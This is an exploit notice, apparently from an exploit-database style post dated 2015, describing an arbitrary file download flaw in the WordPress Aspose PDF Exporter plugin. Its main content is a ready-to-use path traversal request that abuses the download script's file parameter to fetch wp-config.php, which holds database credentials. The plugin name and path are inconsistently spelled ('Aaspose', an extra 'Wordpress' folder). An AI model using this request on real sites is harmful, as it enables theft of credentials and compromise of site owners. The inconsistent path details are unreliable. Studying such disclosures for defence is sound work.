Exploit Title : Wordpress Aaspose-pdf-exporter Plugin File Download Vulnerability Exploit Author : Ashiyane Digital Security Team Vendor Homepage: https://wordpress.org/plugins/aspose-pdf-exporter/ Download Link : https://downloads.wordpress.org/plugin/aspose-pdf-exporter.zip Date : 28 / 3 / 2015 Tested On : windows 8.1 + linux Kali ######################################### ######################################### ~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~> Exploit: | | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php ~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~> Vulnerable Code : http://localhost/wordpress/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=[File Address] Examples : http://localhost/wordpress/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php ######################################### ######################################### Discovered by : Rq07 #########################################